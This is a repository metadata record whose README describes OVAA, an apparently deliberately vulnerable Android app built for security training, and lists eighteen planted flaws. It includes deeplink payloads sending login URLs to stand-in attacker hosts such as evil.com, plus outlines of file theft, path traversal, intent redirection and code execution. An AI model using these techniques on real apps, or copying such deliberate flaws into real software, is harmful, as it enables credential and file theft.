{"id":13589469,"url":"https://github.com/oversecured/ovaa","last_synced_at":"2026-01-17T02:10:42.949Z","repository":{"id":39970858,"uuid":"256492557","full_name":"oversecured/ovaa","owner":"oversecured","description":"Oversecured Vulnerable Android App","archived":false,"fork":false,"pushed_at":"2024-07-18T00:33:14.000Z","size":141,"stargazers_count":686,"open_issues_count":1,"forks_count":186,"subscribers_count":5,"default_branch":"master","last_synced_at":"2025-04-08T09:44:24.084Z","etag":null,"topics":["android-security","appsec","mobile-security","vulnerable-android-apps","vulnerable-application"],"latest_commit_sha":null,"homepage":"https://oversecured.com","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-2-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/oversecured.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-04-17T12:09:08.000Z","updated_at":"2025-04-05T12:14:08.000Z","dependencies_parsed_at":"2024-11-06T09:42:11.428Z","dependency_job_id":null,"html_url":"https://github.com/oversecured/ovaa","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/oversecured/ovaa","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/oversecured%2Fovaa","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/oversecured%2Fovaa/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/oversecured%2Fovaa/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/oversecured%2Fovaa/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/oversecured","download_url":"https://codeload.github.com/oversecured/ovaa/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/oversecured%2Fovaa/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28492057,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-17T00:50:05.742Z","status":"online","status_checked_at":"2026-01-17T02:00:07.808Z","response_time":85,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["android-security","appsec","mobile-security","vulnerable-android-apps","vulnerable-application"],"created_at":"2024-08-01T16:00:30.564Z","updated_at":"2026-01-17T02:10:42.921Z","avatar_url":"https://github.com/oversecured.png","language":"Java","readme":"## Description\nOVAA (Oversecured Vulnerable Android App) is an Android app that aggregates all the platform's known and popular security vulnerabilities.\n\n## List of vulnerabilities\nThis section only includes the list of vulnerabilities, without a detailed description or proof of concept. Examples from OVAA will receive detailed examination and analysis on [our blog](https://blog.oversecured.com/).\n\n1. Installation of an arbitrary `login_url` via deeplink `oversecured://ovaa/login?url=http://evil.com/`. Leads to the user's user name and password being leaked when they log in.\n2. Obtaining access to arbitrary content providers (not exported, but with the attribute `android:grantUriPermissions=\"true\"`) via deeplink `oversecured://ovaa/grant_uri_permissions`. The attacker's app needs to process `oversecured.ovaa.action.GRANT_PERMISSIONS` and pass intent to `setResult(code, intent)` with flags such as `Intent.FLAG_GRANT_READ_URI_PERMISSION` and the URI of the content provider.\n3. Vulnerable host validation when processing deeplink `oversecured://ovaa/webview?url=...`.\n4. Opening arbitrary URLs via deeplink `oversecured://ovaa/webview?url=http://evilexample.com`. An attacker can use the vulnerable WebView setting `WebSettings.setAllowFileAccessFromFileURLs(true)` in the `WebViewActivity.java` file to steal arbitrary files by sending them XHR requests and obtaining their content.\n5. Access to arbitrary activities and acquiring access to arbitrary content providers in `LoginActivity` by supplying an arbitrary Intent object to `redirect_intent`.\n6. Theft of arbitrary files in `MainActivity` by intercepting an activity launch from `Intent.ACTION_PICK` and passing the URI to any file as data.\n7. Insecure broadcast to `MainActivity` containing credentials. The attacker can register a broadcast receiver with action `oversecured.ovaa.action.UNPROTECTED_CREDENTIALS_DATA` and obtain the user's data.\n8. Insecure activity launch in `MainActivity` with action `oversecured.ovaa.action.WEBVIEW`, containing the user's encrypted data in the query parameter `token`.\n9. Deletion of arbitrary files via the insecure `DeleteFilesSerializable` deserialization object.\n10. Memory corruption via the `MemoryCorruptionParcelable` object.\n11. Memory corruption via the `MemoryCorruptionSerializable` object.\n12. Obtaining read/write access to arbitrary files in `TheftOverwriteProvider` via path-traversal in the value `uri.getLastPathSegment()`.\n13. Obtaining access to app logs via `InsecureLoggerService`. Leak of credentials in `LoginActivity` `Log.d(\"ovaa\", \"Processing \" + loginData)`.\n14. Use of the hardcoded AES key in `WeakCrypto`.\n15. Arbitrary Code Execution in `OversecuredApplication` by launching code from third-party apps with no security checks.\n16. Use of very wide file sharing declaration for `oversecured.ovaa.fileprovider` content provider in `root` entry.\n17. Hardcoded credentials to a dev environment endpoint in `strings.xml` in `test_url` entry.\n18. Arbitrary code execution via a DEX library located in a world-readable/writable directory.\n\n---------------------------------------\n*Licensed under the Simplified BSD License*\n\n*Copyright (c) 2020, Oversecured Inc*\n\nhttps://oversecured.com/","funding_links":[],"categories":["Mobile Security","Java","Java (504)","Mobile Pentesting","Android","Tools"],"sub_categories":["Android","Labs","Vulnerable Applications for practice","Vulnerable Apps"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Foversecured%2Fovaa","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Foversecured%2Fovaa","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Foversecured%2Fovaa/lists"}